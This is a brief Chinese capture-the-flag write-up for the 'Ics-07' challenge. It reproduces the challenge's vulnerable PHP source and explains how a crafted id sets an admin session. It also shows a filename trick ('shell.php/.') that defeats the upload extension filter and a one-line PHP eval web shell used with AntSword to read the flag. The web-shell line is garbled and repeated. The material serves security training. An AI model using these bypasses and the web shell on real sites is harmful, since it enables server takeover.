Ics -07 攻防世界
代码审计 + 正则 + 文件上传 + 登录session
源代码已经给出
<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>cetc7</title></head><body><?phpsession_start();if (!isset($_GET[page])) {
show_source(__FILE__);die();}if (isset($_GET[page]) && $_GET[page] != 'index.php') {
include('flag.php');}else {
header('Location: ?page=flag.php');}?><form action="#" method="get">page : <input type="text" name="page" value="">id : <input type="text" name="id" value=""><input type="submit" name="submit" value="submit"></form><br /><a href="index.phps">view-source</a><?phpif ($_SESSION['admin']) {
$con = $_POST['con'];$file = $_POST['file'];$filename = "backup/".$file;if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
die("Bad file extension");}else{
chdir('uploaded');$f = fopen($filename, 'w');fwrite($f, $con);fclose($f);}}?><?phpif (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
include 'config.php';$id = mysql_real_escape_string($_GET[id]);$sql="select * from cetc007.user where id='$id'";$result = mysql_query($sql);$result = mysql_fetch_object($result);} else {
$result = False;die();}if(!$result)die("<br >something wae wrong ! <br>");if($result){
echo "id: ".$result->id."</br>";echo "name:".$result->user."</br>";$_SESSION['admin'] = True;}?></body>
</html>
登录session
<?phpif (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
include 'config.php';$id = mysql_real_escape_string($_GET[id]);$sql="select * from cetc007.user where id='$id'";$result = mysql_query($sql);$result = mysql_fetch_object($result);} else {
$result = False;die();}if(!$result)die("<br >something wae wrong ! <br>");if($result){
echo "id: ".$result->id."</br>";echo "name:".$result->user."</br>";$_SESSION['admin'] = True;}?>
函数floatval获得变量浮点部分
mysql_real_escape_string对id过滤防止sql注入
*\x00*, *\n*, *\r*, *\*, *'*, *"*和*\x1a*
构造id 以1开头以9结尾,且数据库中有这个id
id=1/9
上传shell
过滤
(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename))
可是只能过滤掉最后的.php…
/i是不区分大小写
$代表末尾匹配
因此构造
$file=shell.php/.
con=<?phpeval(con=<?php eval(con=<?phpeval(_POST[‘cmd’]); ?>
调用蚁剑登录找到flag
chdir是切换目录的函数
chdir('uploaded');
这里把上传的文件传到uploaded/backup/下